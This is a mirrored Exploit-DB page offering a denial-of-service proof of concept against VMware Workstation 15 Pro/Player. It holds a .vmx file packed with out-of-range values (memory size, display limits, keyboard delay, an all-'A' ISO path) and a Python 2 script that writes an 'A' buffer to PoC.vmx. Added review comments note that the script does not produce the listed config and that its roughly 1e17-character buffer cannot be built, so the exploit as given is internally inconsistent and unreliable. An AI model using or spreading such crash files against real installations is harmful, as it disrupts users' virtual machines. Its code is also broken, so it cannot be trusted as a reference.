VMware Workstation 15 Pro – Denial of Service

  • 作者: Milad karimi
    日期: 2023-03-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51100/
  • #Title: VMware Workstation 15 Pro - Denial of Service
    #Author: Milad Karimi
    #Date: 2022-10-17
    #Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMware® Workstation 15 Pro (15.5.6 build-16341506)
    #Affected: VMware Workstation Pro/Player 15.x
    
    
    # Start of the .vmx (VMware virtual machine configuration) listing published
    # with this advisory. The page reports a denial of service in Workstation
    # Pro/Player 15.x but does not say which key causes it.
    # NOTE(review): nothing in this first group looks out of range; going by the
    # key names these set the config/hardware version, display strings and the
    # guest OS type -- confirm against VMware's documentation.
    config.version = "8"
    virtualHW.version = "4"
    displayName = "credit's to Ex3ptionaL for find this vouln"
    annotation = "Live CD ISO http://www.irongeek.com"
    # The guestinfo.* strings and the 2005-dated build value suggest the file was
    # adapted from an older live-CD template -- presumably; the page does not say.
    guestinfo.vmware.product.long = "credit's to Ex3ptionaL for find this vouln"
    guestinfo.vmware.product.url = "http://www.millw0rm.com"
    guestinfo.vmware.product.short = "LCDI"
    guestinfo.vmware.product.version.major = "1"
    guestinfo.vmware.product.version.minor = "0"
    guestinfo.vmware.product.version.revision = "0"
    guestinfo.vmware.product.version.type = "release"
    guestinfo.vmware.product.class = "virtual machine"
    guestinfo.vmware.product.build = "1.0.0rc8-20051212"
    uuid.action = "create"
    guestOS = "winxppro"
    #####
    # Memory
    #####
    # memsize is the guest RAM size, which VMware expresses in megabytes, so the
    # value below is far beyond what any host can back. It is one of several
    # out-of-range values in this file; the page does not identify which of them
    # the product fails on.
    # Defensive takeaway: treat a .vmx received from an untrusted source as
    # untrusted input and check numeric keys such as this one before opening it.
    memsize = "20000000000000"
    # memsize = "300000000000000000000000000000"
    # memsize = "400000000000000000000"
    # memsize = "700000000000000000000000000000000000"
    #
    # Alternative larger memory allocations
    #####
    # USB
    #####
    # Virtual USB controller enabled.
    usb.present = "TRUE"
    #####
    # Floppy
    #####
    # Virtual floppy drive disabled.
    floppy0.present = "FALSE"
    #####
    # IDE Storage
    #####
    # One IDE device (ide1:0) is configured as a CD-ROM backed by an image file
    # and set to connect at power-on.
    ide1:0.present = "TRUE"
    #Edit line below to change ISO to boot from
    # NOTE(review): the file name is a long run of "A" characters ending in .iso,
    # i.e. filler rather than a real image path. Whether path length plays any
    # part in the reported crash is not stated on the page.
    ide1:0.fileName = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.iso"
    ide1:0.deviceType = "cdrom-image"
    ide1:0.startConnected = "TRUE"
    ide1:0.autodetect = "TRUE"
    #####
    # Network
    #####
    # One virtual NIC, attached through NAT; the bridged alternative is left
    # commented out below.
    ethernet0.present = "TRUE"
    ethernet0.connectionType = "nat"
    # ethernet0.connectionType = "bridged"
    #
    # Switch these two to enable "Bridged" vs. "NAT"
    #####
    # Sound
    #####
    # Virtual sound card enabled (es1371 device model, auto-detected backend).
    # NOTE(review): none of the network or sound values look out of range.
    sound.present = "TRUE"
    sound.virtualDev = "es1371"
    sound.autoDetect = "TRUE"
    sound.fileName = "-1"
    #####
    # Misc.
    #
    # In the hints below the parenthesised value is presumably the product
    # default and the others are the alternatives -- the file does not define
    # the notation.
    #
    # (normal)  high
    priority.grabbed = "high"
    tools.syncTime = "TRUE"
    workingDir = "."
    #
    # (16)  32  64
    sched.mem.pShare.checkRate = "32"
    #
    # (32)  64  128
    sched.mem.pshare.scanRate = "64"
    #
    # Higher resolution lockout, adjust values to exceed 800x600
    # NOTE(review): both SVGA limits are many orders of magnitude larger than any
    # display resolution. Like memsize, they are out-of-range values; the page
    # does not say which one the product fails on.
    svga.maxWidth = "8000000000000000000"
    svga.maxHeight = "6000000000000000000"
    #
    # The four isolation.tools.*.disable keys below are all FALSE, which leaves
    # drag-and-drop, shared folders (HGFS), copy and paste between guest and host
    # enabled. VMware hardening guidance generally sets these to TRUE for guests
    # that do not need them.
    #
    # (F) T
    isolation.tools.dnd.disable = "FALSE"
    #
    # (F) T
    isolation.tools.hgfs.disable = "FALSE"
    #
    # (F) T
    isolation.tools.copy.disable = "FALSE"
    #
    # (F) T
    isolation.tools.paste.disable = "FALSE"
    #
    # (T) F
    logging = "TRUE"
    #
    #
    # (F) T
    log.append = "FALSE"
    #
    # (3) number of older files kept
    log.keepOld = "1"
    #
    # (0) microseconds
    # NOTE(review): unlike every other entry, this value is unquoted, and it is
    # another out-of-range number (about 1e17 microseconds by the hint above).
    keyboard.typematicMinDelay = 100000000000000000
    # Fixed UUIDs and a generated MAC address carried over in the published
    # file; the MAC's last three octets match the tail of the UUID.
    uuid.location = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"
    uuid.bios = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"
    ethernet0.addressType = "generated"
    ethernet0.generatedAddress = "00:0c:29:3c:d4:4a"
    ethernet0.generatedAddressOffset = "0"
    # Refers to a suspended-state file by name; that file is not part of this
    # page.
    checkpoint.vmState = "live-cd-iso.vmss"
    
    tools.remindInstall = "TRUE"
    
    Exploit code()
    
    # Generator script as published on the page. It is Python 2 (print
    # statements) and is separate from the .vmx listing above: it writes only a
    # run of "A" characters to PoC.vmx, not the key/value configuration.
    # NOTE(review): this multiplication asks for a string of roughly 1.18e17
    # characters, far more than an ordinary host's memory, and it runs before the
    # try block, so a failure here is not caught by the handler below.
    buffer = "A" * 118000000000000000
    payload = buffer
    try:
        # Opened without a with-block; the handle is closed only on the success
        # path.
        f=open("PoC.vmx","w")
        print "[+] Creating %s evil payload.." %len(payload)
        f.write(payload)
        f.close()
        print "[+] File created!"
    # Bare except: every error type is reported with the same generic message.
    except:
        print "File cannot be created"